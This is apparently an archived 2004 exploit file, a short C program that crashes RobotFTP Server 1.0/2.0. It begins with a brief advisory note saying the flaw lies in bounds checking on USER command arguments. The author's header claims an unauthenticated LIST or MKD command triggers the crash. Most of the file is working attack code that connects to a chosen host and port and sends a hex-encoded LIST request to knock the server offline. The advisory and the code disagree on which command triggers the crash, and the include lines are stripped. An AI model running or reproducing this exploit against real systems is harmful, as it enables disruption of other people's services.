// source: https://www.securityfocus.com/bid/9672/info A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length. /************************************************************************************************* * * * Date: 18/2/2004 * * Url: www.robotftp.com * * Versions: 1.0/2.0 * * Bug: Robotftp gets DoS'sed when an unauthorized user tries to do some command like MKD or LIST * * Author: NoRpiUs * * Email: norpius@altervista.org * * Web: http://norpius.altervista.org * * For Unix & Win * * * * I have done this for my birthday that is today :) - Robo-SOFT don't be angry :) * **************************************************************************************************/ #include #include #include #include #ifdef WIN32 #include #include #define close closesocket #else #include #include #include #include #endif #define DOSREQUEST "\x4C\x49\x53\x54\r\n" void errore( char *err ) { printf("%s",err); exit(1); } void usage( char *progz ) { fputs("Robotftp FTP Server remote DoS\n" "By NoRpiUs\n" "Usage: \n", stdout); exit(1); } int main( int argc, char *argv[] ) { int sock; struct hostent *he; struct sockaddr_in target; char recvbuff[512]; #ifdef WIN32 WSADATA wsadata; WSAStartup(0x1, &wsadata); #endif if ( argc < 3 ) usage(argv[0]); if ( (he = gethostbyname(argv[1])) == NULL ) errore("Can't resolve host"); target.sin_family = AF_INET; target.sin_addr = *(( struct in_addr *) he -> h_addr ); target.sin_port = htons(atoi(argv[2])); fputs("[+] Connecting...\n", stdout); if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0) errore("[-] Can't create socket\n"); if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 ) errore("[-] Can't connect\n"); if ( recv( sock, recvbuff, sizeof(recvbuff), 0) < 0 ) errore("[-] Server seems to be down\n"); fputs("[+] Sending DoS request\n", stdout); if ( send( sock, DOSREQUEST, strlen(DOSREQUEST), 0) < 0 ) errore("[-] Cant' send the request\n"); fputs("[+] Done\n", stdout); close(sock); return(0); }